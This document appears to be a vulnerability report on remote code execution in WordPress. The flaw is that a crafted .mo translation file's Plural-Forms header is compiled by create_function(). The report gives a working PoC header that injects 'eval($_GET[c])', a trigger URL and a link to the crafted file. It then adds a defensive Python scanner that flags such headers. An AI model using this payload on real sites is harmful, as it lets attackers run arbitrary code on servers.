WordPress RCE via specially crafted .mo language file
The vulnerable code in wp-includes/pomo/translations.php:
    function make_plural_form_function($nplurals, $expression) {
        // $expression is taken from the Plural-Forms header of the .mo file
        $expression = str_replace('n', '$n', $expression);
        // the header text is interpolated into PHP source without validation
        $func_body = "
            \$index = (int)($expression);
            return (\$index < $nplurals)? \$index : $nplurals - 1;";
        return create_function('$n', $func_body);
    }
PHP's create_function() builds the function by handing the body string to zend_eval_stringl(), so the body is compiled as PHP source. Because $expression comes straight from the Plural-Forms header, an attacker who controls the .mo file can use } to close the anonymous function body early and have arbitrary PHP code executed while the anonymous function is being created :-)
PoC:
Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;
I provide a crafted .mo language file; set the default language to Chinese, then access the following URL and the phpinfo() function will be executed.
/index.php?c=phpinfo();
The crafted .mo language file: https://drive.google.com/file/d/0ByqJ6Vtb_VsYbkw5U0F4QzBrUnM
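The root cause is that header text from a language file reaches the PHP compiler. A defender can catch such files before they are installed, because a legitimate gettext plural rule is a small C-like integer expression over n and nothing else. The following is an added example, not code from WordPress or from the report: it parses the GNU .mo container, pulls out the Plural-Forms header, and accepts only the plural-rule token grammar (n, integers, parentheses, arithmetic, comparison and ternary operators). The sample .mo blobs are constructed in-memory so the script runs offline; the hostile header is the one quoted in the PoC above. The robust fix in the application itself is the same idea: evaluate the plural expression with a restricted parser instead of the PHP interpreter.

```python
"""Flag .mo files whose Plural-Forms header is not a plain plural rule."""
import re
import struct

MO_MAGIC_LE = 0x950412DE  # magic of a little-endian .mo, read little-endian
MO_MAGIC_BE = 0xDE120495  # the same bytes from a big-endian .mo, read little-endian

# Tokens a gettext plural expression may contain. Multi-char operators are
# listed before their single-char prefixes so the alternation is unambiguous.
PLURAL_TOKEN = re.compile(
    r"\s+|n|\d+|\(|\)|\?|:|\|\||&&|==|!=|<=|>=|<|>|%|\+|-|\*|/|!"
)
PLURAL_FORMS = re.compile(r"^\s*nplurals\s*=\s*(\d+)\s*;\s*plural\s*=\s*(.*?)\s*;?\s*$")


def plural_expression_is_safe(expr):
    """True if expr is made only of plural-rule tokens with balanced parentheses."""
    pos, depth = 0, 0
    while pos < len(expr):
        m = PLURAL_TOKEN.match(expr, pos)
        if not m:
            return False  # ';', '}', '$', quotes, letters other than n ...
        tok = m.group()
        if tok == "(":
            depth += 1
        elif tok == ")":
            depth -= 1
            if depth < 0:
                return False  # ')' closing a parenthesis that was never opened
        pos = m.end()
    return depth == 0


def plural_forms_header(data):
    """Return the Plural-Forms header value of a .mo blob, or None if absent."""
    if len(data) < 28:
        raise ValueError("too short to be a .mo file")
    magic = struct.unpack("<I", data[:4])[0]
    if magic == MO_MAGIC_LE:
        e = "<"
    elif magic == MO_MAGIC_BE:
        e = ">"
    else:
        raise ValueError("bad .mo magic")
    _magic, _rev, count, orig_off, trans_off = struct.unpack(e + "5I", data[:20])
    for i in range(count):
        id_len, _id_off = struct.unpack(e + "2I", data[orig_off + 8 * i:orig_off + 8 * i + 8])
        if id_len != 0:
            continue  # the metadata entry is the one whose msgid is empty
        s_len, s_off = struct.unpack(e + "2I", data[trans_off + 8 * i:trans_off + 8 * i + 8])
        meta = data[s_off:s_off + s_len].decode("utf-8", "replace")
        for line in meta.split("\n"):
            key, sep, value = line.partition(":")
            if sep and key.strip().lower() == "plural-forms":
                return value.strip()
    return None


def scan_mo(data):
    """Classify a .mo blob as ('clean' | 'suspicious' | 'no-plural-forms', header)."""
    header = plural_forms_header(data)
    if header is None:
        return ("no-plural-forms", "")
    m = PLURAL_FORMS.match(header)
    if not m:
        return ("suspicious", header)  # does not even look like nplurals=..; plural=..
    nplurals, expr = int(m.group(1)), m.group(2)
    if nplurals < 1 or not plural_expression_is_safe(expr):
        return ("suspicious", header)
    return ("clean", header)


def build_mo(entries):
    """Serialize {msgid: msgstr} as a minimal little-endian .mo (constructed test data)."""
    keys = sorted(entries)  # real .mo files keep msgids sorted
    ids, strs, id_tab, str_tab = b"", b"", [], []
    for k in keys:
        kb, vb = k.encode(), entries[k].encode()
        id_tab.append((len(kb), len(ids)))
        ids += kb + b"\0"
        str_tab.append((len(vb), len(strs)))
        strs += vb + b"\0"
    n = len(keys)
    orig_off, trans_off = 28, 28 + 8 * n
    ids_off = trans_off + 8 * n
    strs_off = ids_off + len(ids)
    out = struct.pack("<7I", MO_MAGIC_LE, 0, n, orig_off, trans_off, 0, strs_off + len(strs))
    out += b"".join(struct.pack("<2I", ln, ids_off + off) for ln, off in id_tab)
    out += b"".join(struct.pack("<2I", ln, strs_off + off) for ln, off in str_tab)
    return out + ids + strs


# Constructed samples: two benign headers and the hostile header from the PoC.
BENIGN_ZH = build_mo({"": "Content-Type: text/plain; charset=UTF-8\nPlural-Forms: nplurals=1; plural=0;\n",
                      "Hello": "你好"})
BENIGN_RU = build_mo({"": "Plural-Forms: nplurals=3; plural=(n%10==1 && n%100!=11 ? 0 : "
                          "n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2);\n"})
HOSTILE = build_mo({"": "Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;\n"})

if __name__ == "__main__":
    for name, blob in (("zh", BENIGN_ZH), ("ru", BENIGN_RU), ("hostile", HOSTILE)):
        print(name, scan_mo(blob))
```

Run it over every .mo under wp-content/languages (read each file as bytes and call scan_mo) and treat anything other than clean as a file to quarantine; the check is format-level, so it does not depend on which PHP sink eventually consumes the header.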